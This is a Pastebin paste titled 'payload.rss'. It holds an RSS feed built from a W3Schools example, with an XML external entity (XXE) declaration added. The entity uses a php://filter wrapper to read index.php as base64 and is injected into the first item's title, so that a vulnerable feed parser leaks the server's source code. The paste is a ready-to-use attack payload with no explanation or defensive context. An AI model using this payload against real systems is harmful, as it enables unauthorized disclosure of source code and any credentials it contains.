Advertisement
KnHackes

payload.rss

Oct 22nd, 2019
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 0.65 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE replace[
  3. <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
  4. ]>
  5.  
  6. <rss version="2.0">
  7.  
  8. <channel>
  9.   <title>W3Schools Home Page</title>
  10.   <link>https://www.w3schools.com</link>
  11.   <description>Free web building tutorials</description>
  12.   <item>
  13.     <title>&xxe;</title>
  14.    <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  15.    <description>New RSS tutorial on W3Schools</description>
  16.  </item>
  17.  <item>
  18.    <title>XML Tutorial</title>
  19.    <link>https://www.w3schools.com/xml</link>
  20.    <description>New XML tutorial on W3Schools</description>
  21.  </item>
  22. </channel>
  23.  
  24. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement